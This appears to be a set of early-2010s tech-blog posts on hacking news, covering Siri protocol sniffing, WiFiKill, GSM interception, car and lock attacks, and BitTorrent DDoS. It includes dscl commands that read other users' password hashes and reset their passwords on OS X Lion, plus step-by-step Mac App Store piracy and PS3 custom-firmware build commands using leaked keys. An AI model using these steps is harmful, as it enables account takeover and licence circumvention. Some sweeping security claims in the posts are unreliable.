Note: This app is just for fun, it doesn’t cause any damages to anyone other than annoyance. Use it with precaution.

The project is similar to the Upside-down-ternet project: from the phone you can flip pictures on someone’s computer upside down. There are couple of fun things you can do with this app. It lets you:

• Flip pictures on someone’s PC.
• Change Google searches keywords,
• redirect websites to some other sites,
• and many more features to come.

App works well in combination with Shark for Android – combined they allow you to capture packets when logged onto wifi networks.

Simply install from the Android Market (on a rooted device running >2.2), and download the setup files from the application. This requires about 600MB free SD card space. The program needs the phone to be rooted, and have busybox (most custom firmwares have this).

Developers can contribute at Launchpad (main project) and Sourceforge.

Download the App from Market.

We write latest and greatest in Tech Guides, Apple, iPhone, Tablets, Android,  Open Source, Latest in Tech, subscribe to us @geeknizer on Twitter OR on Facebook Fanpage, Google+:
 

After a sufficient amount of reverse engineering, enough understanding has been made regarding the Siri Protocol. To tap the app communication with the cloud, hackers setup a rogue DNS server that manipulates and tracks the interactions.

Siri communicates with server at port 443, to a server at 17.174.4.4 which is nothing but https://guzzoni.apple.com. The connection, obviously, is over https that uses SSL certificates to verify if the domain and the client are both authentic. Hackers managed to create custom SSL certification authority, added it to their iPhone 4S, then used it to sign their own certificate for a fake “guzzoni.apple.com”. This proved to be successful – Siri was happily sending commands to a faked HTTPS sever, which, as stated before, can be replicated again and again. Using this data, they managed to understand the data thats transmitted for every command.

Siri’s protocol is opaque. Let’s have a look at a Siri HTTP request. The request’s body is binary but headers look like this:

ACE /ace HTTP/1.0
Host: guzzoni.apple.com
User-Agent: Assistant(iPhone/iPhone4,1; iPhone OS/5.0/9A334) Ace/1.0
Content-Length: 2000000000
X-Ace-Host: 4620a9aa-88f4-4ac1-a49d-e2012910921

Facts about Siri Header :

• The request is using a custom “ACE” method, instead of a more usual GET.
• The url requested is “/ace”
• The Content-Length is nearly 2GB. Which is obviously not conforming to the HTTP standard.
• X-Ace-host is some form of GUID. After trying with several iPhone 4Ses, it seems to be tied to the actual device (pretty much like an UDID).

Siri Body payload (binary data)

When Siri binary data is looked in a hex editor, you would notice that it starts with 0xAACCEE. Oh, seems like header ! Unfortunately, nothing after that is readable coz its compressed using zlib.

To be more precise this AACCEE header in the request body is 3 bytes, but actual data payload starts after 4th byte.  Unzipping data after 4th byte yields actual data that is sent over the network.
Unzipped data still has some binary artifacts plus some human readable text in form of bplist00 i.e. data is some binary plist.

Here is the description of the payload chunks:

• Chunks starting with 0x020000xxxx are “plist” packets, xxxx being the size of the binary plist data that follows the header.
• Chunks starting with 0x030000xxxx are “ping” packets, sent by the iPhone to Siri’s servers to keep the connection alive. Here xx is the ping sequence number.
• Chunks starting with 0x040000xxxx are “pong” packets, sent by Siri’s server as a reply to ping packets. Without surprise, xx is the pong sequence number.

Deciphering the content of binary plists: Its easy, you can do it on Mac OS X with the “plutil” command-line tool. Or in ruby with the CFPropertyList gem on any platform.

How iPhone 4S talks with apple Servers:

The audio data: The iPhone 4S sends raw audio data compressed using the popular VoIP codex Speex audio.

Signature: The iPhone 4S sends identifiers everywhere. So if you want to use Siri on another device, you still need the identfier of at least one iPhone 4S. You would need one of the tools from below tool chain to extract that. But beware, Apple could blacklist an identifier.

The actual content: The protocol is actually very, very network chatty. Your iPhone sends a tons of things to Apple’s servers. And those servers reply an incredible amount of informations. For example, when you’re using text-to-speech, Apple’s server even reply a confidence score and the timestamp of each word.

Writing your own Siri-based Application for Android, iOS

You can download Applidium’s tool chain and get started with your own app that’s Siri enabled.

Update: Spire: Install Siri on iPad, iPod Touch, iPhone 4, iPhone 3GS

We write latest and greatest in Tech Guides, Apple, iPhone, Tablets, Android,  Open Source, Latest in Tech, subscribe to us@geeknizer on Twitter OR on Facebook Fanpage:

Captcha stands for Completely Automated Public Turing Test to differentiate between Computers and Humans. It was invented by Carnegie Mellon University computer science graduate student in 2000 as a security tool to safeguard web sites from automated bot attacks and spammers.

Team of researchers at Stanford have outsmarted the Captcha codes. Their anti-spam tool-breaker was able to kill off captcha’s protective cover.

“As we substantiate by thorough study, many popular websites still rely on schemes that are vulnerable to automated attacks. For example, our automated Decaptcha tool breaks the Wikipedia scheme… approximately 25% of the time. 13 out of 15 of the most widely used current schemes are similarly vulnerable to automated attack by our tool. Therefore, there is a clear need for a comprehensive set of design and testing principles that will lead to more robust captchas.”

Decaptcha is capable of isolating the text from noise in the captcha image. From the clean text image, it then runs a smart OCR (optical character recognition) to translate image to text.Each text character is identified individually.

To prototype was able to break into Real world websites with Captcha. Decaptcha worked successfully on Visa’s Authorize.net payment gateway was defeated 66 per cent of the time. eBay’s captcha was sidestepped 43 per cent of the time. Lower thwart rates were recorded at Wikipedia, Digg and CNN.

Google and reCAPTCHA were the only two that beat out the Stanford team’s automated tool–no gotchas for either one.

More details: PDF

We write latest and greatest in Tech Guides, Apple, iPhone, Tablets, Android,  Open Source, Latest in Tech, subscribe to us@geeknizer on Twitter OR on Facebook Fanpage:

You can now kick users & devices from Wifi using an android app called WiFiKill. The app makes sure that a targeted users is not able to connect to Internet using your Wifi.

WiFiKill is pretty simple: it scans your network for connected devices and gives the option to individually kill their network connectivity. You can also chose to Kick all users, if you intend to. Tick the “all” box and the network will be completely empty in a matter of seconds. To re-enable connectivity for any device, simply uncheck the box next to its name.

Note: App does wacky stuff to your wifi by injecting spoofing DNS and several other UDP stuff, works only on Rooted phones.

There’s alot of things you can do with it, but doing so for Public or shared networks can create  serious problems. We hope you don’t boot users and create havoc using this app. Use it wisely, don’t be a jackass. If you promise to be ethical, feel free to install the app from market.

We write latest and greatest in Tech Guides, Apple, iPhone, Tablets, Android,  Open Source, Latest in Tech, subscribe to us@geeknizer on Twitter OR on Facebook Fanpage:

Michigan police was already found to do that last month, but if sources are to be trusted, they are going nationwide in US and soon in several other countries. The device used is the CelleBrite UFED, which is able to copy most of the data on over 2500 different mobile devices. It does all that in under 2 minutes. UFED brochure claims:

The UFED system extracts vital information from 95% of all cellular phones on the market today, including smartphones and PDA devices (Palm OS, Microsoft, Blackberry, Symbian, iPhone, and Google Android). Simple to use even in the field with no PC required, the UFED can easily store hundreds of phonebooks and content items onto an SD card or USB flash drive.

And technical description:

The UFED hardware with Physical Extraction module, used to create Physical and/or Logical dumps from mobile devices, which can then be saved to a USB disk drive, SD memory card, or directly to your PC.ƒ The UFED Physical Analyzer (PA) PC application, which provides an in-depth physical memory analysis of the extracted mobile phone data (phonebook contents, SMS messages, call logs, image files, video files, audio files, and more) The Physical Analyzer also serves to generate comprehensive and verified evidence reports of relevant data extracted and analyzed from the mobile device.

The UFED Physical Analyzer software allows the investigator to perform in-depth analysis of the extracted data
and generate reports. The UFED PA application provides the following key features:

• ƒ Analysis of the hex dump with a layered view of memory content
• Provides a detailed view of the hex dump
• Reconstructs the phone file system
• Decodes contact lists, SMS messages, call logs, phone information (IMSI, ICCID, user codes) and more
• Provides a view of data files – images, videos, etc.
• Provides access to both current and deleted data
• Retrieves phone passwords
• Simple viewing and user friendly browsing of information

ƒ Powerful search tools

• Instantly search for project content
• Search the hex dump or file system

Search by various parameters such as strings, bytes, numbers, dates

• Use GREP search (regular expressions) to look for specific data strings
• Bookmarking memory locations for indexing of key areas for later review

The ACLU fears that the next time you get stopped for speeding in Michigan, you’ll be handing over your cell phone, and your entire mobile history, to the nice officers. Of course, you have no idea into what all they can grab. Of course, you don’t have an option.

There’s something thats more scary than being able to extract your information — Being able to inject information into the phone like fake call logs, gps logs, text messages, calendar appointments. It would open your call log SQLLite DB (in the case of an iPhone, Android) and write a new entry. e.g. If my intake information says I received the phone at 15:20:00 but there is a write to phonecalls.sql at 16:22:00 User better have a logical explanation.

We write about Google, Twitter, Security, Open Source, Programming, Web, Apple, iPhone, Android and latest in Tech @geeknizer on Twitter or by subscribing below:

Apple, unfortunately, overlooked an important aspect.

If we invoke the directory services listing using the /Search/ path, we see a different result:

$ dscl localhost -read /Search/Users/bob

From the output, we can see the following data:

dsAttrTypeNative:ShadowHashData:

62706c69 73743030 d101025d 53414c54 45442d53 48413531 324f1044 74911f72 3bd2f66a 3255e0af 4b85c639 776d510b 63f0b939 c432ab6e 082286c4 7586f19b 4e2f3aab 74229ae1 24ccb11e 916a7a1c 9b29c64b d6b0fd6c bd22e7b1 f0ba1673 080b1900 00000000 00010100 00000000 00000300 00000000 00000000 00000000 000060

Note: The SHA512 hash is stored from bytes 32-96 (italic) and the salt is stored from bytes 28-31(bold). Hashes are discussed in detail here.

This ShadowHashData attribute actually contains the same hash stored in user bob’s shadow .plist file. What makes it worst is that root privileges are not required. All users on the system, regardless of privilege, have the ability to access the ShadowHashData attribute from any other user’s profile and can be cracked using a simple brute-force dictionary attack python script. But you, perhaps, don’t need need to get into that coz there are easier ways.

You can easily change passwords in Lion, you don’t need to authenticate when changing password for another user. So, cracking password in Lion is as easy as:

$ dscl localhost -passwd /Search/Users/geek

Boom! You can now change User’s password, without having to authenticate as that user.

We write latest and greatest in Tech Guides, Apple, iPhone, Tablets, Android,  Open Source, Latest in Tech, subscribe to us@geeknizer on Twitter OR on Facebook Fanpage:

[image credit]

This new DIY Data network is low cost, low-power, easy to deploy tool developed by Berkeley professor Kurtis Heimerl. Its essentially a good alternative for regions with low or no coverage.Recently one of such prototypes has been tested here in Unitesd States and results seem to be very promising. 
The benefits of the Village Base Station:

flexible off-the grid deployment due to low power requirements that enable local generation via solar or wind; explicit support for local services within the village that can be autonomous relative to a national carrier; novel power/coverage trade-offs based on intermittency that can provide bursts of wider coverage; and a portfolio of data and voice services (not just GSM).

A similar prototype has been used in Jalalabad, Afghanistan. Jalalabad’s longest link is currently 2.41 miles, between the FabLab and the water tower at the public hospital in Jalalabad, transmitting with a real throughput of 11.5Mbps (compared to 22Mbps ideal-case for a standards compliant off-the-shelf 802.11g router transitting at a distance of only a few feet). The system works consistently through heavy rain, smog and a couple of good sized trees.

Here’s how this GSM DIY equipment works, video explains the channeling & signaling concepts of GSM based on OpenBTS:

Developing countries & rural areas with limited Internet access would benefit from this project. And of course there are endless hobby activities it can get you started with.

“Buy This Satellite” is an effort to crowdfund enough money to purchase the communications satellite TerreStar-1.

Related: DIY Drone Plane: Hack Wifi, Phone calls

We write latest and greatest in Tech Guides, Apple, iPhone, Tablets, Android,  Open Source, Latest in Tech, subscribe to us @geeknizer on Twitter OR on Facebook Fanpage:

Two security researchers, Mike Tassey and Richard Perkins,  have unleashed a complete DIY methodology to Launch your personal, specially equipped WASP (Wireless Aerial Surveillance Platform) drone that to flys overhead and sniff Wi-Fi network, intercept cellphone calls, or launch denial-of-service attacks with jamming signals.

This drone plane runs on Arduino and would cost you $6,000. This drone is based on FMQ-117B U.S. Army target drone and equipped it with Wi-Fi and hacking tools — IMSI catcher and antenna to spoof a GSM cell tower and hack calls. What’s more? It can launch a dictionary attack on the network using its database of 340million words.

GSM Hack to break into voice calls has been floating around for a while, and that’s what inspires these security researchers. Recommended read: How to Hack GSM Nework, Phone

The device onboard tricks phones to disable encryption, and records call details and content before they’re routed to their intended receiver through VoIP or redirected to anywhere else the hacker wants to send them.

Drone plane weighs 5Kgs and is 2.5m long and is quiet enough to spy on anyone, without trouble. You know, its US military drone, designed to be quiet. It can be automated to travel through programmed GPS coordinates and Google Earth, whole thing is self-driven apart from take off and landings which need to be controlled.

While such a drone may violate a few flying laws, it doesn’t break any FCC regulations as it uses the HAM radio frequency band or a 3G connection for communication. As to the reason for building it, creators Mike Tassey and Richard Perkins just wanted to prove there is a vulnerability that can easily be taken advantage of with a UAV such as this. It can easily cover 10,000 sq. ft of area using its inboard basestation.

WASP is an open source platform called Auto Pilot using Arduino that Tassey will discuss how to build at DEFCON-19 next week. It was originally unveiled last August with the following video giving you a close up view and interview with the creators

Update: Instructions to Build this drone

Endless Possibilities

Darker side:
Its pretty much obvious that if two security researchers can collaborate to create such a destructive element for communications, wonder how strong could it be when its in terrorists hands.

Hackers would use them to fly above corporations to steal data like confidential IP (intellectual property) or may be launch a DoS attack or jam the cellphone signals of a corporation, without letting anyone know.

You can stop a car, a person from coming into your facility, but what about things that fly overhead? These drones can not just broadcast jamming signal, they can laser focus specific users in crowd.

Positives:
If you think about positive aspects of such drones, they can prove out to be quiet helpful during natural disasters when other communications break. They can be bagged with more sensors, cameras and help army in critical missions, possibilities are endless.

Related: DIY GSM Cellular Data Network

We write latest and greatest in Tech Guides, Apple, iPhone, Tablets, Android,  Open Source, Latest in Tech, subscribe to us @geeknizer on Twitter OR on Facebook Fanpage:

Modern Laptop battery contains its own monitoring circuit which reports the status of the battery to the OS. The circuit is also responsible for preventing battery from overcharging, this comes handy when the laptop is switched off.

The scurity researcher has discovered that the batteries on Macbooks are shipped with the default password on the micro-controller. It can be inferred that if someone knows the default password, the firmware of the battery can be controlled to do many things from simply ruining the battery to install a malware which reinstalls whenever the OS boots. Since you gain access to the micro-controller that controls the battery, it becomes actually possible to overuse and overheat the battery to a limit where it can even catch fire.

Miller claims this hack can make the hacker achieve something that was unachievable before —  it’s possible to use them to do something really bad – Insert a new Hard drive, reinstall the software, flash the BIOS, and every time it would reattack and screw the user. And the worse part, it undetectable and impossible to  eradicate other than removing the battery.

Apple released a fix in 2009 to fix problems by creating two passwords used for the chip on the battery. By hacking that password, its possible to do anything like giving false reading to the charger and let it overcharge to cause fire, or to completely rewrite the firmware.

Hack is Not Easy

Luckily enough, miller hasn’t made all details public. He claims that to successfully exploit this vulnerability,  attacker has to analyze the 2009 software updates from Apple for the password. If he is able to retrieve the password, he will have to find a vulnerability in the interface between the OS and the firmware.

But these details would be made public at te yearly security conference, BlackHat. He will also be unveiling a tool to public that will change the password of the battery to a random string. Hope Apple releases a fix before that.

We write latest and greatest in Tech Guides, Apple, iPhone, Tablets, Android,  Open Source, Latest in Tech, subscribe to us @geeknizer on Twitter OR on Facebook Fanpage:

Lulzsec hacker group have been on a hacking rampage since a while now. They have been taking down sites of the CIA, Sony, FBI and a bulk of other large and small companies. Motive behind the hacks has rather been dicey, is it for fun or something else. The document is available on Pastebin and their activities are visible via their Twitter account.

Very recently they hacked released 62,000 username and passwords of a popular porn site. However, the ugly part of the story is that users tend to have similar passwords for all their accounts: mail, facebook and even paypal. Hackers and script buggies have been scanning the password list and discovered that this is actually the case for most users whose username/passwords have been shared in the leak.

If you analyze the password list, its not hard to figure out that a lot of users registered on the porn site are actually people from government organizations. Other than that Google, Yahoo, facebook have already out the accounts corresponding to those ids on hold till user verifies the ownership to prevent all kinds of misuses. However, hotmail and other unpopular email providers are still vulnerable.

What You can do: Staying secure online

Go through the password list and if you are on it, you are probably already in trouble. Going further, make it a habit to have different user/password combos for different sites. Doing so can be hard but if you follow a pattern for passwords, remembering them could be piece of a cake. e.g. you can change the first or last digit of the password based on the domain name. A password that was “pA$$w0rdG” on gmail would become  “pA$$w0rdf” on facebook. Do something similar, but purely your own idea.

What is the Future of LulzSec

Lulzsec would continue to hack down the internet with almost no clear intent. The press release states that for the past month or so they have been causing chaos throughout the internet by attacking several targets and they’re going to bring down more internet laws by continuing their public shenanigans, and that their actions are causing clowns with pens to write new rules for users.

They say that releasing data is just as ‘evil’; however they mock by saying, “This is the Lulz lizard era, where we do things just because we find it entertaining.”

They conclude by saying, “We’ve been entertaining you 1000 times with 140 characters or less, and we’ll continue creating things that are exciting and new until we’re brought to justice, which we might well be.“

We write latest and greatest in Tech Guides, Apple, iPhone, Tablets, Android,  Open Source, Latest in Tech, subscribe to us@geeknizeron Twitter OR on Facebook Fanpage:

Researchers at UaC & University of Washington have spent years trying to fin security flaws in modern cars which are controlled via mini-computer systems and so far they have identified a bunch of security flaws in cars.

The most interesting attacks were triggered via car’s Bluetooth and cellular network systems, or through malicious software in the diagnostic tools used in automotive repair shops.

The one that interested us was on the Car stereo. By adding extra code to a digital music file, they were able to turn a song burned to CD into a Trojan horse. When played on the car’s stereo, this song could alter the firmware of the car’s stereo system, giving attackers an entry point to change other components on the car. This type of attack could be spread on P2P file-sharing networks without arousing suspicion.

“It’s hard to think of something more innocuous than a song,” said Stefan Savage, a professor at the University of California.

The same team had achieved wide Car hacks in experiments in which they were able to kill the engine, lock the doors, turn off the brakes and falsify speedometer readings on a late-model car of 2009. In that experiment, they had to plug a laptop into the car’s internal diagnostic system in order to install their malicious code. In 2010, team also hacked Cars from wireless tyre sensors.

But the latest research, is about remotely controlling cars. The attacks over Bluetooth, the cellular network, malicious music files and via the diagnostic tools used in dealerships were all possible, if difficult to pull off, Savage said. “The easiest way remains what we did in our first paper: Plug into the car and do it,” he said.

Car Hacking: Possibilities & Future

Now, thieves could instruct cars to unlock their doors and report their GPS coordinates and Vehicle Identification Numbers to a central server. “An enterprising thief might stop stealing cars himself, and instead sell his capabilities as a service to other thieves,” Savage said. A thief looking for certain kinds of cars in a given area could ask to have them identified and unlocked, he said.

With the high technical barrier to entry, the researchers believe that hacker attacks on cars will be very difficult to pull off, but they say they want to make the auto industry aware of potential problems before they become pervasive.

Another problem for would-be car thieves is the fact that there are significant differences among the electronic control units in cars. Even though an attack might work on one year and model of vehicle, it’s unlikely to work on another. ”

So far, carmakers have been very receptive to the university researchers’ work and appear to be taking the security issues they’ve raised very seriously.

We write latest and greatest in Tech Guides, Apple, iPhone, Tablets, Android, Open Source, Latest in Tech, subscribe to us @taranfx on Twitter OR on Facebook Fanpage:

Most office doors employ magnetic sensors that require a access card to be swiped across to unlock. These magnetic cards have unique magnetic pattern underneath the plastic, which when scanned is matched against a person’s identity.

Among the most popular lineup of Office door lock, Kaba Ilco Simplex lineup has been there for more than 3 decades, and had been pretty much unhackable till 2010. But if you have a strong  magnet, it opens up effortlessly in under 3 seconds.

You devise the Hack, you need powerful rare-earth magnets, which formulates the state-of-the-art attack.

Worst part is,  most other locks that use a combination chamber are equally vulnerable.

How it Works

Normally, these door locks need to capture weak magnetic fields generated in vicinity of a access card or a specific combination of buttons  have to be pressed to make the bolt withdraw. However, when a strong magnet is presented,  it messes with the magnetic field inside the combination chamber, the system scrambles making the bolt withdraw even if no buttons are pressed/ no card is presented.

Kaba, being the industry leader, has fixed the problem with a new combination chamber design in the latest models of its lock, but that won’t change the existing locks that have lying world over in offices since last 3 decades.

The rare earth (lanthanide) elements are metals that are ferromagnetic, meaning that like iron they can be magnetized, but their Curie temperatures are below room temperature, so in pure form their magnetism only appears at low temperatures. However, they form compounds with the transition metals such as iron, nickel, and cobalt, and some of these have Curie temperatures well above room temperature. Rare earth magnets are made from these compounds.

You can buy one of these neodymium magnet for about $10, no experience required.

Warning: This is just for educational purposes, do not hack into someone’s office, you and alone you would be responsible for any consequences.

Alternatively, you can design a a card writer that can hack magnetic locks:

In the above demo, hacker used pre-made connectors so he could easily disconnect and reconnect the device. When you put the reader’s cover back, the Gecko would be hidden behind it.

The card reader also continues to work fine with the Gecko attached. It passes along the signal from the reader to the control system as it’s supposed to. But when someone swipes an authorized card that unlocks the door, Gecko saves that signal.

With that saved unlock signal, the attacker can swipe a ‘replay’ card that tells Gecko to re-send that saved signal, and the doors unlock. What’s more, any saved access logs would only show that the same person who originally swiped the saved signal swiped his card again.

The replay card isn’t anything special, and could be any card. It’s just one that Gecko knows about beforehand. When it sees that card’s code – because the card reader passes it along – Gecko knows to send its saved signal in response.

The device also knows to look out for another card code – again, just a regular card – and in that case, disable the system. Only the recognized replay card can unlock the door. Every other card, authorized or not, will fail.

We write about Security,  Open Source, Programming, Web, Apple, iPhone,Android and latest in Tech @taranfx on Twitter or by subscribing below:

The hacker of the iPhone App store has come with a solution for Mac App store, and claims that they don’t encourage piracy but they hate a model where a user cannot try before buy. There should be app testing bracket before buying.

Why Mac App Store sucks:

1. You’ll have to Re-purchase many of your apps
2. No trials, no demos, no beta versions
3. Heavily restricted, controlled Apps.
4. Many apps would not be available on App Store, thanks to their policies (VLC media player included)
5. No System-related apps: Apps have no “root” permissions, whatsoever.
6. No downloaders: No ftp, http downloaders or even browsers. WTF?
7. Not many open source apps: Mac App Store violates GPL, most open source would never make it to app store.

Do you still need another reason ?

Disclaimer: This method doesn’t encourage Piracy. Try the apps, buy them if you like them, support the developers OR one day you wouls stop getting good apps.

Warning: The illegal app sharing violates the copyright and Apple App Store rules.

How to Crack / Pirate Mac App Store

1. Install the latest Snow Leopard update (10.6.6) from system updates.
2. Log in the new App Store (from your dock) and download Twitter (free app)
3. Now go to Applications folder, locate Twitter, right click, Show Package Contents, navigate to Contents folder and copy _CodeSignature, _MASReceipt and CodeResources.\
4. Download Angry Birds ( http://bit.ly/gy9wzk ) and run the dmg file.
5. Now drag Angry Birds into the Applications folder. Right click, Show Package Contents, navigate to Contents folder and delete _CodeSignature, _MASReceipt and CodeResources. Now paste in the files you copied from the Twitter.app in step 3.
6. Complete, now your Mac App Store is cracked. You can enjoy Angry birds and other .app file from the new Mac App store which you can find online.

We write latest and greatest in Tech Guides, Apple, iPhone,Tablets, Android, Google, Open Source, Latest in Tech, subscribe to us @taranfx on Twitter OR:

This PS3 Hack lets you Pirate PS3 games, Run Linux OS, Play PS1, PS2 Games on PS3.

KakaRoto has announced the details of the hack.

First CFW working. Grab http://bit.ly/hszcH3, then “./create_cfw.sh PS3UPDAT.355.PUP CFW.PUP”. Permanently adds “install pkg files” menu.

Folks at PS3hacks has detailed the process.

How to install Custom Firmware on PS3 for Pirated Games, OtherOS/Linux Support [PS3 Slim, Fat]

Download ps3 utilities and ps3 tools from github / team fail0verflow using these commands on your Linux PC:

1. • git clone https://github.com/kakaroto/ps3utils.git

   • cd ps3utils

   • make

   • cd ..

   • git clone git://git.fail0verflow.com/ps3tools.git

   • cd ps3tools

   • make

   • cp pkg unpkg ../ps3utils

2. Grab the PS3 encryption/decryption/signing keys from github:

   • git clone https://github.com/kakaroto/ps3keys.git ~/.ps3

3. Download PS3 3.55 (or whatever official firmware PUP) from here
4. Extract and copy “PS3UPDAT.PUP” to the “ps3utils” directory
5. Create the PS3 Custom Firmware (CFW) from the original/official update (OFW):

   • cd ps3utils

   • ./create_cfw.sh PS3UPDAT.PUP CFW.PUP

6. Copy and rename CFW.PUP to a USB storage device keeping this directory structure in mind: /PS3/UPDATE/PS3UPDAT.PUP
7. Connect that USB device to your PS3 and install from Settings -> System Update

If you’re currently running 3.41 (or earlier) you can either remain there and create a specific CFW PUP for that version, or you can upgrade to a later PS3 firmware version, like 3.55 for example. It’s whatever original PUP file you use – only you cannot flash a version lower than the current version installed on your PS3. So if you’re already at 3.55, where you’re unable to downgrade, then for the moment you have no other choice but CFW (or OFW) 3.55. 3.41 on the other hand: upgrade or create CFW 3.41 and for the interim you’re still able to jailbreak and run unsigned ‘brews. See the other notes below.

Download: PS3 CFW 3.41 | PS3 CFW 3.55

Note:

1. This CFW does not modify the kernel in any way, meaning all the current compiled homebrew out there will not install or run using “Install Package Files” from the XMB.
2. With the above point in mind you should know this CFW does not enable piracy. No piracy, no backups – straight homebrew.
3. Current PS3 homebrew and new homebrew will need to be “retail” packaged and signed; that’ll happen with fail0verflow’s tools.
4. This is only the beginning. Prepare yourself for utter and absolute awesomeness.
5. PSN works.
6. PS1, PS2 games run in backward compatibility mode

You may need to install the CFW PUP from the PS3 Recovery Menu. To do that, follow these steps:

1. Ensure the PS3UPDAT.PUP is in /PS3/UPDATE/ on your USB device.
2. Power down the PS3.
3. Now press and hold the power button, the system will startup and shutdown again.
4. Release the power button, then press & hold power again, you’ll hear one beep followed by two consecutive beeps.
5. Release power then follow the on-screen instructions. You’re now in the recovery menu.
6. Connect the USB device and select “System Update.”
7. Hope for the best.

Note: you can restore OFW using the above method too.

Related:

• DIY Open Source PS3 Jailbreak allows Unsigned Apps, Games
• HowTo Jailbreak, Mod PS3 Slim, Fat
• PS3 USB mod Chip: Backup Games on HDD
• Jailbreak your PS3 with Android Phone

For latest Gaming, iPhone, android, Tech news @taranfx on Twitter and you can also subscribe to use below:

GSM Security is inherently weak and that’s why it was made possible to Hack GSM Security (GSM’s 64-bit A5/1 encryption), last year. However, governments own devices that are worth $50,000, which essentially monitor phone activities for National security.

“GSM is insecure, the more so as more is known about GSM,” said Security Research Labs researcher Karsten Nohl. “It’s pretty much like computers on the net in the 1990s, when people didn’t understand security well.”

Every aspect of the GSM Hack was demonstrated from start to end including scenarios in which GSM networks exchange subscriber location data, in order to correctly route phone calls and SMSs, allows anyone to determine a subscriber’s current location with a simple Internet query, to the level of city or general rural area. Once a phone’s City is known, a potential attacker can drive through the area, sending the target phone “silent” or “broken” SMS messages that do not show up on the phone. By sniffing to each bay station’s traffic, listening for the delivery of the message and the response of the target phone at the correct time, the location of the target phone can be more precisely identified.

GSM Network Sniffer

Researchers replaced the firmware of a simple Motorola GSM phone with their own, which allowed them to retain the raw data received from the cell network, and examine more of the cellphone network space than a single phone ordinarily monitors. Modifying the USB interface, helped them send this data in real time to a computer, which captured every bit of the information.

By sniffing the network while sending a target phone an SMS, they were able to determine precisely which random network ID number belonged to the target. This gave them the ability to identify which of the myriad streams of information they wanted to record from the network. After that, the next step is essentially decrypting the information. ITs not that easy, but was made possible by the way operator networks exchange system information with their phones.

As part of this background communication, GSM networks send out identifying information, as well as “keepalive” messages and empty spaces are filled with buffered bytes. Truth be told, a new GSM standard was put in place several years ago to turn these buffers into random bytes, they in fact remain largely identical today, under a much older standard. Sticking to older standards enabled hackers to predict with a high degree of probability the plain-text content of these encrypted system messages. This, combined with a 2 terabyte table of pre-computed encryption keys (a so-called rainbow table), allows a cracking program to discover the secret key to the session’s encryption in about 20 seconds. (Rainbow tables are usually used in all kinds of Brute-force password hacking).

Many GSM operators reuse these session keys for several successive communications, allowing a key extracted from a test SMS to be used again to record the next telephone call, minimizing the need for recomputation.

The process was demonstrated using their software to sniff the headers being used by a phone, extract and crack a session-encryption key, and then use this to decrypt and record a live GSM call between two phones in no more than a few minutes.

Can something be done about GSM’s security?

Any geek can make such devices and with the help of the open source software, can mimic these hacks. So can we really do something to prevent these kinds of hacks from happening?

“Much of this vulnerability could be addressed relatively easily”, Nohl said. “Operators could make sure that their network routing information was not so simply available through the Internet. They could implement the randomization of padding bytes in the system information exchange, making the encryption harder to break. They could certainly avoid recycling encryption keys between successive calls and SMSs”.

“This is all a 20-year-old infrastructure, with lots of private data and not a lot of security,” he said. “We want you to help phones go through the same kind of evolutionary steps that computers did in the 1990s.”

Worst part is, all the current 3G phones are NOT shielded from this hack. Knowing that 3G is primarily used for Data, its now easy to capture any 3G user’s online activity including their passwords and credit card numbers.

Maybe its high time for GSM consortium to wakeup and address these issues, or atleast learn few things from CDMA networks, which are inherently secure.

Resources:

Rainbow tables, Airprobe, Kraken  srlabs.de
OsmocomBB firmware osmocom.or

PDF Presentation

The Video Presentation can be downloaded here: Part1, Part2.

We write about Security,  Open Source, Programming, Web, Apple, iPhone,Android and latest in Tech @taranfx on Twitter or by subscribing below:

The vulnerability is actually found in the technology that works on trackerless torrents (DHT). Its now possible for someone to trick downloaders of popular files into send thousands of requests to a webserver of choice, taking it down as a result. Effectively turning BitTorrent into a very effective DDoS tool.

BitTorrent have lived over the years because of their reliability and effectiveness. Unlike a server centric model, where the dependency is on a one server (or distributed servers), its distributed and directly available through individual nodes that auto-discover each other, resulting in faster and more reliable data transfers. This is the reason why, everyday, millions of people (Swarm) use bittorrents to download Terabytes of data.

Hackers have now used the popular DHT technology to abuse BitTorrent downloaders to DDoS a webserver of choice. DHT, under normal operation, discovers peers who are downloading the same files, without communicating with a central BitTorrent tracker. If there are enough peers downloading the same file, this could easily take down medium to large websites. The worrying part is that the downloaders who are participating in the DDoS will not be aware of what’s going on.

“The core problem are the random NodeIDs. The address hashing and verification scheme works for scenarios like the old Internet, but becomes almost useless in the big address space of IPv6,” Astro told TorrentFreak in a comment. As a result, any BitTorrent swarm can be abused to target specific websites and potentially take them down.

These days,  DDoS attacks have been in the news regularly, mostly carried out under the flag of Anonymous “Operation Payback”. Initially anti-piracy targets such as the MPAA and RIAA were taken offline, and last month the focus switched to organizations that acted against Wikileaks, including Mastercard, then Visa and Paypal.

“Not connecting to privileged ports (< 1024) where most critical services reside,” is one ad-hoc solution, but Astro says that since it’s a design error, the protocol has to be redefined eventually.

The idea of using BitTorrent as a DDoS tool is not entirely new. In fact, researchers have previously shown that adding a webserver’s IP address as a BitTorrent tracker could result in a similar DDoS. The downside of this method is, however, that it requires a torrent file to become popular, while the DHT method can simply exploit existing torrents that are already being downloaded by thousands of people.

Over the next few years, it may actually be able to create non-blockable Torrents. Even today, there are ways of Bypassing torrent blocking, throttling. Now, what remains to be seen is that will BitTorrent developers do enough to fix DDoS vulnerability or will it remain open and cause havoc.

You can find the Slides of the presentation here.
Update: Download Video Presentation here

For latest Security, iPhone, android, Tech news @taranfx on Twitter and you can also subscribe to use below:

PSJailbreak Exploit worked great hack and actually made pirated games possible because Hypervisor allows unsigned code to run on PS3.

It has now been Hacked again, this time to Enable Linux Installation, and even Play pirated games on PS3 & PS3 Slim. The good work was announced today at 27C3 congress by a group called fail0verflow which would make it possible to Install Full Linux OS (with 3d) and Pirated Games on Linux.

The first few minutes of the conference were spent explaining the state of security on other consoles (Wii, 360, etc). Following this, the group went on to explain the current state of affairs on the PS3. First, explaining Geohot’s memory line glitching exploit from earlier this year. The team then went on to explain the current PS3 security bypasses, such as jailbreaking and service mode/downgrading.

Approximately a half hour in, the team revealed their new PS3 secrets, the moment we all were waiting for. One of the major highlights here was, dongle-less jailbreaking by overwriting the bootup NOR flash, giving complete control over the system. The other major feat, was calculating the public private keys (due to botched security), giving users the ability to sign their own SELFs Following this, the team declared Sony’s security to be “EPIC FAIL”! Even though it took decade to break this security.

The recent advent of these new exploits means current firmware is vulnerable, v3.55 and possibly beyond. It will be very difficult for Sony to fix the described exploits.

The team then displayed the website http://fail0verflow.com/, where we assume they will host examples of the new exploits and further details. They stated, that easy to use tools would be coming next month.

Download Presentation PPT: 1780_27c3_console_hacking_2010.rar (1.43 MB)

